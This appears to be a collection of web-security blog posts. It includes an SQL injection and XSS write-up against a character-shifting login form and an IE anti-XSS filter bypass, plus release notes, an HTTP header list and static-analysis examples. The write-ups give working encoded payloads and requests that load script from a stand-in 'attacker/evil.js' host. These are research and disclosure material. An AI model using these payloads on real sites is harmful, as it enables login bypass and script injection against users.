The Insecurity of Security Through Obscurity

The topic of SQL Injection (SQL) is well known to the security industry by now. From time to time, researchers will come across a vector so unique that it must be shared. In my case I had this gibberish — &#MU4<4+0 — turn into an exploitable vector due to some unique coding done on the developers’ end. So as all stories go, let’s start at the beginning.

When we come across a login form in a web application, there are a few go-to testing strategies. Of course the first thing I did in this case was submit a login request with a username of admin and my password was ‘ OR 1=1–. To no one’s surprise, the application responded with a message about incorrect information. However, the application did respond in an unusual way: the password field had ( QO!.>./* in it. My first thought was, “what is the slim chance they just returned to me the real admin password? It looks like it was randomly generated at least.” So, of course, I submitted another login attempt but this time I used the newly obtained value as the password. This time I got a new value returned to me on the failed login attempt: ) SL”+?+1′. Not surprisingly, they did not properly encode the HTML markup characters in this new response, so if we can figure out what is going on we can certainly get reflective Cross Site Scripting (XSS) on this login page. At this point it’s time to take my research to a smaller scale and attempt to understand what is going on here on a character-by-character level.

The next few login attempts submitted were intended to scope out what was going on. By submitting three requests with a, b, and c, it may be possible to see a bigger picture starting to emerge. The response for each appears to be the next letter in the alphabet — we got b, c, and d back in return. So as a next step, I tried to add on a bit to this knowledge. If we submit aa we should expect to get bb back. Unfortunately things are never just that easy. The application responded with b^ instead. So let’s see what happens on a much larger string composed of the same letter; this time I submitted aaaaaaaaaaaa (that’s 12 ‘a’ characters in a row), and to my surprise got this back b^c^b^b^c^b^. Now we have something to work with. Clearly there seems to be some sort of pattern emerging of how these characters are transforming — it looks like a repeating series. The first 6 characters are the same as the last 6 characters in the response.

So far we have only discussed these characters in their human readable format that you see on your keyboard. In the world of computers, they all have multiple secondary identities. One of the more common translations is their ASCII numerical equivalent. When a computer sees the letter ‘a’ the computer can also convert that character into a number, in this case 97. By giving these characters a number we may have an easier time determining what pattern is going on. These ASCII charts can be found all over the Internet and to give credit to the one I used, www.theasciicode.com.ar helped out big time here.

Since we have determined that there is a pattern repeating for every 6 characters, let’s figure out what this shift actually looks like numerically. We start off with injecting aaaaaa and as expected get back b^c^b^. But what does this look like if we used the ASCII numerical equivalent instead? Now in the computer world we are injecting 97,97,97,97,97,97 and we get back 98,94,99,94,98,94. From this view it looks like each value has its own unique shift being applied to it. Surely everyone loved matrices as much as I did in math class, so lets bust out some of that old matrix subtraction: [97,97,97,97,97,97] – [98,94,99,94,98,94] = [-1,3,-2,3,-1,3]. Now we have a series that we can apply to the ASCII numerical equivalent to what we want to inject in order to get it to reflect how we want.

Finally, its time to start forming a Proof of Concept (PoC) injection to exploit this potential XSS issue. So far we have found out that they have a repeating pattern of 6 character shifts being applied to our input and we have determined the exact shift occurring on each character. If we apply the correct character shifts to an exploitable injection, such as “><img/src=”h”onerror=alert(2)//, we would need to submit it as !A:llj.vpf<%g%mqduqrp@`odur+1,.2. Of course, seeing that alert box pop up is the visual verification that needed that we have reverse engineered what is going on.

Since we have a working PoC for XSS, lets revisit our initial testing for SQL injection. When we apply the same character shifts that we discovered to ‘ OR 1=1–, we find that it needs to be submitted as &#MU4<4+0. One of the space characters in our injection is being shifted by -1 which results in a non-printable character between the ‘U’ and the ’4′. With the proper URL encoding applied, it would appear as %26%23MU%1F4%3C4%2B0 when being sent to the application. It was a glorious moment when I saw this application authenticate me as the admin user.

Back in the early days of the Internet and well before I even started learning about information security, this type of attack was quite popular. In current times, developers are commonly using parameterized queries properly on login forms so finding this type of issue has become quite rare. Unfortunately this particular app was not created for the US market and probably was developed by very green coders within a newly developing country. This was their attempt at encoding users passwords when we all know they should be hashed. Had this application not returned any content in the password field on failed login attempts, this SQL injection vulnerability would have remained perfectly hidden to any black box testing through this method. This highlights one of the many ways a vulnerability may exist but is obscured to those testing the application.

For those still following along, I have provided my interpretation of what the backend code may look like for this example. By flipping the + and – around I could also use this same code to properly encode my injection so that it reflects the way I wanted it too:


<!DOCTYPE html>
<html>
<body>
<form name="login" action="#" method="post">
<?php
$strinput = $_POST['password'];
$strarray = str_split($strinput);
for ($i = 0; $i < strlen($strinput); $i++) {
    if ($i % 6 == 0) {
        $strarray[$i] = chr(ord($strarray[$i]) - 1);
        }
    if ($i % 6 == 1) {
        $strarray[$i] = chr(ord($strarray[$i]) + 3);
        }
    if ($i % 6 == 2) {
        $strarray[$i] = chr(ord($strarray[$i]) - 2);
        }
    if ($i % 6 == 3) {
        $strarray[$i] = chr(ord($strarray[$i]) + 3);
        }
    if ($i % 6 == 4) {
        $strarray[$i] = chr(ord($strarray[$i]) - 1);
        }
    if ($i % 6 == 5) {
        $strarray[$i] = chr(ord($strarray[$i]) + 3);
        }
    }
$password = implode($strarray);
echo "Login:<input type=\"text\" name=\"username\" value=\"" . htmlspecialchars($_POST['username']) . "\"><br>\n";
echo "Password:<input type=\"password\" name=\"password\" value=\"" . $password . "\"><br>\n";
// --- CODE SNIP ---
$examplesqlquery = "SELECT id FROM users WHERE username='" . addslashes($_POST['username']) . "' AND password='$password'";
// --- CODE SNIP ---
?>
<input type="submit" value="submit">
</form>
</body>
</html>

List of HTTP Response Headers

Every few months I find myself looking up up the syntax of a relatively obscure HTTP header. Regularly I find myself wondering why there isn’t a good definitive list of common HTTP Response headers anywhere. Usually the lists on the Internet are missing half a dozen HTTP headers. So I’ve taken care to gather a list all of the HTTP response headers I could find. Hopefully this is useful to you, and removes some of the mystique behind how HTTP works if you’ve never seen headers before.

Note: this does not include things like IncapIP or other proxy/service specific headers that aren’t standard, and nor does it include request headers.

Header Example Value Notes
Access-Control-Allow-Credentials true
Access-Control-Allow-Headers X-PINGOTHER
Access-Control-Allow-Methods PUT, DELETE, XMODIFY
Access-Control-Allow-Origin http://example.org
Access-Control-Expose-Headers X-My-Custom-Header, X-Another-Custom-Header
Access-Control-Max-Age 2520
Accept-Ranges bytes
Age 12
Allow GET, HEAD, POST, OPTIONS Commonly includes other things, like PROPFIND etc…
Alternate-Protocol 443:npn-spdy/2,443:npn-spdy/2
Cache-Control private, no-cache, must-revalidate
Client-Date Tue, 27 Jan 2009 18:17:30 GMT
Client-Peer 123.123.123.123:80
Client-Response-Num 1
Connection Keep-Alive
Content-Disposition attachment; filename=”example.exe”
Content-Encoding gzip
Content-Language en
Content-Length 1329
Content-Location /index.htm
Content-MD5 Q2hlY2sgSW50ZWdyaXR5IQ==
Content-Range bytes 21010-47021/47022
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP default-src ‘self’ Different header needed to control different browsers
Content-Security-Policy-Report-Only default-src ‘self’; …; report-uri /csp_report_parser;
Content-Type text/html Can also include charset information (E.g.: text/html;charset=ISO-8859-1)
Date Fri, 22 Jan 2010 04:00:00 GMT
ETag “737060cd8c284d8af7ad3082f209582d”
Expires Mon, 26 Jul 1997 05:00:00 GMT
HTTP /1.1 401 Unauthorized Special header, no colon space delimiter
Keep-Alive timeout=3, max=87
Last-Modified Tue, 15 Nov 1994 12:45:26 +0000
Link <http://www.example.com/>; rel=”cononical” rel=”alternate”
Location http://www.example.com/
P3P policyref=”http://www.example.com/w3c/p3p.xml”, CP=”NOI DSP COR ADMa OUR NOR STA”
Pragma no-cache
Proxy-Authenticate Basic
Proxy-Connection Keep-Alive
Refresh 5; url=http://www.example.com/
Retry-After 120
Server Apache
Set-Cookie test=1; domain=example.com; path=/; expires=Tue, 01-Oct-2013 19:16:48 GMT Can also include the secure and HTTPOnly flag
Status 200 OK
Strict-Transport-Security max-age=16070400; includeSubDomains
Timing-Allow-Origin www.example.com
Trailer Max-Forwards
Transfer-Encoding chunked compress, deflate, gzip, identity
Upgrade HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
Vary *
Via 1.0 fred, 1.1 example.com (Apache/1.1)
Warning Warning: 199 Miscellaneous warning
WWW-Authenticate Basic
X-Aspnet-Version 2.0.50727
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Permitted-Cross-Domain-Policies master-only Used by Adobe Flash
X-Pingback http://www.example.com/pingback/xmlrpc
X-Powered-By PHP/5.4.0
X-Robots-Tag noindex,nofollow
X-UA-Compatible Chome=1
X-XSS-Protection 1; mode=block

If I’ve missed any response headers, please let us know by leaving a comment and I’ll add it into the list. Perhaps at some point I’ll create a similar list for Request headers, if people find this helpful enough.

iCEO

As many of you know, I started WhiteHat Security more than 10 years ago with the mission to help secure the Web, company by company. It has been an incredible roller coaster ride over the past decade, both at WhiteHat Security, which has experienced phenomenal growth, as well as within the industry itself. By that I mean that we have come a long way: organizations and companies are now more aware of how critical their presence is on the web, and therefore how crucial it is that they ensure that presence is secure. I am proud to say that we now manage more than 30,000 websites today, but with more than 900 million websites on the Internet today, we clearly still have a long way to go. And with that, I am pleased to announce that I have accepted the WhiteHat Security Board of Director’s invitation to step in to the role of interim CEO of WhiteHat Security.

I am very proud of what this company has achieved since 2001: we have grown from a team of one to more than 350 passionate contributors in all areas of the business, including the world’s largest army of hackers; we have received some of the highest industry accolades and awards out there; WhiteHat Sentinel is now a leading web application security solution for nearly 600 of the world’s best-known brands, and we continue to experience exponential growth. All of this success is due in large part to the leadership and direction of our former CEO Stephanie Fohn who took a leap of faith with us more than 8 years ago and who will remain one of the company’s biggest supporters. I would be remiss if I did not acknowledge the work and dedication that she has put in to this company and I wish her the best as she takes time to be with family.

The Internet is a continuously evolving space. New websites launch every day and new threats emerge constantly. As such, web security is complex even for some of the most seasoned security practitioners. My focus will remain on ensuring that our customers – both current and future – have the best product and technology experience and that they get the highest levels of support that such a fast-paced market dictates. We will continue to lead on the fronts of innovation and customer success, and we will do that with a team of some of the most talented application security technologists, business executives, practitioners and contributors that this industry has to offer.

I look forward to leading WhiteHat Security into this next chapter.

Aviator Updates and Windows Alpha

Aside from the a Windows version of Aviator which is on the way (we get countless emails a day asking about it), we wanted to quickly update our users on what the latest versions of Aviator for Mac have fixed. Here is a list of the various fixes:

Aviator Release 1.4

  • This release contained crash fixes.
  • Links from emails or IMs, etc. will always be opened in protected mode.
  • Focus is set to the omni bar when opened in a new tab.

Aviator Release 1.5

  • This release contained fix for an AdBlock extension installation issue – a common extension requested by our users.

Aviator Release 1.6

  • This release updated Aviator to the latest version (31.0.1650.57) of Chromium at the date of release.

Aviator Release 1.7

  • This release contains a bugfix for an Application quit command issue not working.

The browser should have auto updated, but if it didn’t for some reason please download the latest version to get the fixes above. You can check your current version by going to “WhiteHat Aviator”->”About WhiteHat Aviator.” As we begin the countdown to the launch of the Windows Beta, we are opening our program to users who want to be added to the list of Alpha testers for Windows. The Alpha user program is set to probably start the second week of Febuary or therabouts. Please contact us if you’re interested in joining the Aviator Alpha for Windows.

Challenging Security Assumptions in Open Source and Why it Matters

Guest post by G.S. McNamara

GS McNamara

Open source is great. Startups, non-profits, enterprises, and the government have adopted open source software. Whitehouse.gov runs on a modified instance of Drupal, the free and open source content management framework, with security modifications. Another open source project, Apache Solr, is what powers search on whitehouse.gov. And finally, all of it runs on the LAMP solution stack. This is just one example of open source adoption by the federal government. Open source software is attractive in part because it can help the bottom line by avoiding vendor lock-in and leveraging the global community’s effort in creating new features quickly.

But open source code that has been scrutinized by many must be secure, right? Sometimes, no. Do not skip the security assessment of a Web application simply because it is based on open source code. I am not talking about the introduction of insidious backdoors in the code, but about design decisions made in open source projects that have real security implications. Some of these design decisions can support really attractive features, but come with a hidden cost. Security concerns are not always highlighted in the documentation, and busy developers using open source code likely will not know about them. While application developers might be versed in secure development practices, they may make the assumption that so too are the developers contributing to the open source projects they build upon. Security weaknesses that make it past both sets of developers may later be discovered by the users of the application.

Thankfully there are tools and services that can be used to automatically scan your Web application and the libraries it uses for security vulnerabilities. An additional set of tools and services can be leveraged after the application is deemed functionally complete. I would suggest that open source developers clearly mark the security tradeoffs involved in design decisions, and match them up with a common terminology such as Web Application Security Consortium’s (WASC) Threat Classification to help developers using your work understand the risk tradeoffs. If you are using the open source please evaluate your Web applications using a combination of static and dynamic analysis tools. Some tools can be used while still in development to avoid future, more costly surprises that require additional engineering to remediate. Some security tools are created for specific open source projects and frameworks, and are designed to be aware of security shortcomings within those projects and frameworks. Developers can use these tools while developing to be alerted to security issues as they are introduced into the application they are developing.

We are close, but we are not completely talking the same language when it comes to security. For instance, in my recent work on a pre-deployment security evaluation of Ruby on Rails Web application, I found what can be categorized under WASC’s Threat Classification as an Insufficient Session Expiration (WASC-41) weakness (PDF link) provided by the Rails framework itself. This weakness resides in the cookie-based session storage mechanism CookieStore, which is both enabled by default and attractive for its performance benefits.

In discussing this issue, which also exists in the popular Django framework, I realized there is also a semantic problem. This became evident during conversations with contributors to these open source projects. This session termination weakness does not fall under the examples given by the projects’ security guides of a replay attack or session hijacking. When replay attacks are mentioned in the documentation and elsewhere, the examples given are actions that can be taken (again) within an existing session on behalf of a user, such as re-purchasing a product from a shopping website. When “session hijacking” is discussed, talks concern stealing a user’s session while it is still active. The documentation does not talk about how the terminated session itself can be exhumed, which is the root issue I have worked to point out. Even a developer who has read the security guides for these projects would be blindsided by this nuance. More work is needed to better define vendor-neutral security weaknesses so their risks can be highlighted and managed appropriately regardless of the particular technology.

The bottom line is that you cannot trust that all eyes have vetted all security issues in the open source software your application is built on. Both applications and their components need to be tested by the developers for security flaws. Open source software design choices may have been made that are not secure enough for your environment, and the security tradeoffs of these choices may not even be mentioned in the project’s documentation. A huge benefit of open source software is that you can review the security of the code itself; take advantage of that opportunity to ensure you understand the risks that are present in your code.

About G.S.
G.S. McNamara is a senior technology and security consultant, and an intelligence technologies postgraduate based in the Washington, D.C. area. Formerly, he worked in research and development lab on DARPA malware analysis and Web security programs. He began his career as an IT consultant to a K Street medical practice. He works with startups as well as on federal contracts building Web and mobile applications.

About our “Unsung Hero Program”
Every day app sec professionals tirelessly protect the Web, and we recognize that this is largely owed to a series of small victories. These represent untold stories. We want to help share your story. To learn more click here.

Why com.com Should Scare You

A long time ago I began to compile a list of lesser known but still very scary choke points on the Internet. This was a short list of providers (like the DNS 4.2.2.2 that most routers use, for instance) that could have major impact if they were ever compromised or owned by a nefarious 3rd party. One of those was com.com.

Com.com is the single best typo squatter domain on the planet. Let’s say, for instance, you accidentally type in user@yahoo.com.com (notice the end there). Yes, it would go to .com.com email servers if they were set up to allow email to come in. If you typed a URL as http://www.yahoo.com.com similarly, you would also redirect to the typo domain. Or how about phishing sites of ebay.com.com or have you downloaded the latest patch from microsoft.com.com? Given that .com is the largest TLD, com.com is the best typo domain naturally.

A few months ago and without much fan fare, com.com was silently sold by CNET to DSparking.com – one of the most notorious domain squatters ever. Sources close to the deal told me it was sold for around $1.5 million. Yes, the fox owns the hen-house. For $1.5 million it was a steal though – it’s easily worth that just in typo traffic and the huge volume of accidental inbound links.

However, things are not as bad as they could be. For instance, port 80 (web) is open, yes, but port 25 (mail) is not. If and when DSparking decides to open port 25 they will start receiving tons of email that is potentially extremely sensitive. Even if it seems rejected by the mail servers they could still be logging it.

For now mail appears to be closed and has been since the deal went through. They could easily be opening port 25 only to selective IP address ranges, or even opening and closing it periodically to get a snapshot of traffic. There’s no easy way to know for sure. I doubt it’s open at all but should that change, and it could easily, this should be considered an extremely dangerous domain.

Correction:
as @spazef0rze pointed out although port 25 is closed on the website, mail is still being processed through a seperate DNS entry:

$ host -t MX yahoo.com.com
yahoo.com.com mail is handled by 10 mx.b-io.co.

Also, as @mubix noted, there are many other ports/protocols that can be subject to interception if typo’d in the same way. So yes, it’s probably time to block this. No good can come of it.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page not cause immediate JavaScript code execution, that untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further to the first official HTML standard in HTML 2.0 in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of a HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword: >

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the usage of decimal and hexadecimal encodings are not the flaw, but rather two implementations that make use of the method that exploits the flaw. Often simple URL/URI-encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw with Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data and that injected trusted data is not subject to validation by Internet Explorer’s anti-XSS filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Aviator 1.2 Beta Released

A few weeks have passed and we’ve had an overwhelmingly positive response from the community for the Aviator Beta. As you can probably expect, the vast majority of comments we received were around building a Windows version or a Linux version. But in the mean time, we wanted to make sure we continued iterating on some of the bugs that have floated in. Aviator version 1.2 has the following changes:

  • Fixed gate keeper – unidentified developer code signing issue
  • Fixed crash issue with Mac version 10.6
  • Fixed plugins installation issue (correcting an error in the User Agent)
  • Fixed broken images while adding new user in settings page
  • Fixed typo issue in the Protected mode message popup
  • Permissions fixed to be safer and less permissive

If you already have Aviator, it should automatically update. If you don’t, please feel free to download Aviator here.

We’re committed to fixing the remaining issues, and iterating. As we decide how to move forward we encourage everyone to continue to send us bug reports and tell us what you think, what you’d like to see, and how we can improve. You can reach us through one of our emails. Together we’ll make the web a more private place, one browser at a time!

Blindspot – Target Fixation

This is part two of a series of posts about blindspots that I discussed during my LASCON keynote presentation this year. To see the first post about network and host security blindspots, click here.

One thing I have come to notice is that there is a strange tendency in our industry to focus on specific things, just because that’s what’s interesting to us. I definitely encourage enthusiasm, but not when it comes with a blindspot towards other vulns. For instance, one excercise I regularly ask people to do is to give me an off the cuff DREAD severity rating for a particular vuln that they are currently excited about. They start by saying, “It’s horrible” – which is a very strong word in the English language I’d typically say is a high level of risk severity. However, after performing a DREAD analysis by hand, it almost always ends up significantly lower than the person instinctually felt.

Likewise, I see strange blindspot in the industry around buying of vulns. I did an experiment and attempted to sell a half dozen vulns (mostly medium to high level severity) and I was surprised to find that there were no buyers. Let me show you why that’s odd. A buffer overflow in some DNS server might give an attacker a user level access to a machine, and that would be worth $100k on the vuln markets, let’s say. Some of the exploits I discovered would allow an attacker to get a shell on the box in the “www” user context. So both vulns are almost equivalent with the exception of the method of propagation (remote unauthenticated vs CSRF). One is worth $100k and the other is worth $0. Seems odd? Let’s dig in a bit deeper.

I began asking my friends in the underground what a compromised webserver is worth to them. They say somewhere around $500 for what they were doing with it. So if my exploit allowed them to compromise 2,000 CMSs (which it could rather easily) it would be a $1 million pay day for their group. I confirmed with then that even an attack using CSRF would still be easy to monetize – so even the method of propagation wasn’t an issue. There’s a blindspot here. If the security industry is not willing to pay a dime, but attackers are valuing it at $1 million, that’s a discrepancy that makes it extremely difficult to stay on the right side of the law.

I think the problem has always been that there is a misperception in our industry of the importance of what we think is cool or intellectually interesting versus what attackers think is useful and can be leveraged to make money. Admittedly, vuln purchase programs all come down to a supply and demand issue. However, since there is no easy outlet for webappsec vuln research even after all these years, things will continue to stay bad for a very long time. I predict this problem won’t go away any time in the near future — until all vulns are purchased on an equal playing field, using DREAD or something similar. For now though, expect your CMSs to stay vulnerable, unless you’re being extremely proactive.

The point is, I encourage you not focus too much on one target, one vuln, or one vuln class, when there are others with the potential to do equal or greater damage potential or that are easier to exploit. Just because it’s interesting to us as security researchers doesn’t mean attackers see it the same way.

Announcing Support for PHP in WhiteHat Sentinel Source

It is with great pleasure that I formally announce support for the PHP programming language in WhiteHat Sentinel Source! Joining Java and CSharp, PHP is now a member of the family of languages supported by our static code analysis technology. Effective immediately, our users have the ability to start scheduling static analysis scans of web applications developed in PHP for security vulnerabilities. Accurately and efficiently supporting the PHP language was a tremendous engineering effort; a great reflection upon our Engine and Research and Development teams.

Static code analysis for security of the PHP programming language is nothing new. There are open source and commercial vendors already claiming support for this language and have done so for quite some time now. So what’s so special about the support for PHP in WhiteHat Sentinel Source? The answer centers on our advancement in the ability for static analysis to model and simulate the execution of PHP accurately. Almost every other PHP static code analysis offering is limited by the fact that it cannot overcome the unique challenges presented by dynamic programming languages, such as dynamic typing. With an inability to accurately model type information associated with expressions and statements, for example, users were unable to correctly capture rules needed to identify security vulnerabilities. WhiteHat Sentinel Source’s PHP offering ships with a highly tuned type inference system that piggy-backs off our patented Runtime Simulation algorithm to provide much deeper insight into source code – thereby overcoming the limitations of previous technologies.

Here is a classic PHP vulnerability that most, if not all, static code analysis tools should identify as a Cross-Site Scripting vulnerability:


$unsafe_variable = $_GET['user_input'];

echo "You searched for:<strong>".$unsafe_variable."</strong>";

This code retrieves untrusted data from the HTTP request, concatenates that input with string literals, and finally echoes that dynamically constructed content out to the HTML page. Writing static code analysis rules for any engine capable of data flow analysis is fairly straight forward… the return value of the _GET field access is a source of untrusted data and the first argument to the echo function invocation is a sink. Why is this easy to capture? Well… the signatures for the data types represented in the rules are incredibly simple. For example, the signature for the echo method is “echo(object)” where “echo” is the function name and “(object)” indicates that it accepts one argument whose data type is unknown. We assume all parameter types are the type ‘object’ to keep things simple; we cannot possibly know all parameter types for all function invocations without performing more rich analysis. Static analysis tools all have their own unique way of capturing security rules using a custom language. To keep discussions about static analysis security rules vendor agnostic, we will only be discussing rule writing and rule matching at the code signature level. Let’s agree on the format of [class name]->[function name]([one or more parameters]).

Let’s make this a little more interesting. Consider the following PHP code snippet that may or may not be indicative of a SQL Injection vulnerability:



$anonymous = new Anonymous ();

$anonymous->runQuery($_GET['name']);


This code instantiates a class called “Anonymous” and invokes the “runQuery” method of that class using unstrusted data from the HTTP request. Is this vulnerable to SQL Injection? Well – it depends on what runQuery does. Let’s assume that the Anonymous class is part of a 3rd party library for which we do not have the source or for which we simply do not want to include in the scan. Let’s also assume that we know runQuery dynamically generates and executes SQL queries and is thus considered a sink. Based on these assumptions, a manual code review would clearly indicate that yes, this is vulnerable to SQL Injection. But how would we do this with static analysis? Here’s where it gets tricky…

We want to mark the “runQuery” method of the “Anonymous” type as a sink for SQL commands such that if untrusted data is used as an argument to this method, then we have SQL Injection. The problem is we need to not only capture information about the “runQuery” in our sink rule, but we must also capture the fact that it is associated with the “Anonymous” class. The code signature that must be reflected in the security rule would look as follows: Anonymous->runQuery(object).

Unfortunately, basic forms of static analysis are unable to determine with reasonable confidence that $anonymous variable is of type Anonymous – in fact $anonymous could be of any type! As a result, the underlying engine is never able to match the security rule to the $anonymous->runQuery($_GET['name']) statement resulting in a lost vulnerability.

How does WhiteHat Sentinel Source’s PHP offering overcome this problem? it’s simple… in theory. When the engine first runs, it builds a model of the source code and attempts to compare the date sink rule against the $anonymous->runQuery($_GET['name']) method invocation. At this point, the only information we have about this statement is the method name and number of arguments producing a code signature as follows: ?->runQuery(object). Compare this signature to the signature represented in our sink rule: Anonymous->runQuery(object). Since we cannot know the type of the $anonymous variable at this point, we perform a partial match such that we only compare the method name and arguments to those captured in the security rule. Since the statement’s signature is a partial match to our rule’s signature, we mark the model as such and move on.

After processing all our security rules, the static code analysis engine will begin performing data flow analysis on top of our patented Runtime Simulation algorithm looking for security vulnerabilities. The engine will first see the expression “$anonymous = new Anonymous();” and actually record the fact that the $anonymous variable, at any point in the future, may be of type “Anonymous”. Next, the engine will hit the following statement “$anonymous->runQuery($_GET['name']);”. This statement was previously marked with a SQL Injection sink via a partial match. We now have more information about the $anonymous variable and now check if it is a full match with the original security rule. The statement’s signature is now known to be: Anonymous->runQuery(object) which fully matches the signature represented by the sink security rule. With a full match realized, the engine treats this statement as a sink and flags the SQL Injection vulnerability correctly!

Ok – that was a little too easy. Let’s make this more challenging… consider the following PHP code snippet:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = new Anonymous();
} elseif (funct_a() == funct_b()) {
     $anonymous = new NotSoAnonymous();
} else {
     $anonymous = new NsaAnonymous();
}

$anonymous->runQuery($_GET['name']);

What the heck does the engine do now when it sees the runQuery statement? The engine will collect all data type assignments for the $anonymous variable and use all such types in an attempt to realize a full matching for the runQuery statement. The engine will see three different possible code signatures for the statement. They are as follows:

Anonyous->runQuery(object)
NotSoAnonymous->runQuery(object)
NsaAnonymous->runQuery(object)

The engine will take these three signatures and compare to the data type found in the signature represented by the partial match security rule. Given that the first of three signatures fully matches the signature represented by the security rule, the engine will treat the statement as a sink and flag the SQL Injection vulnerability correctly!

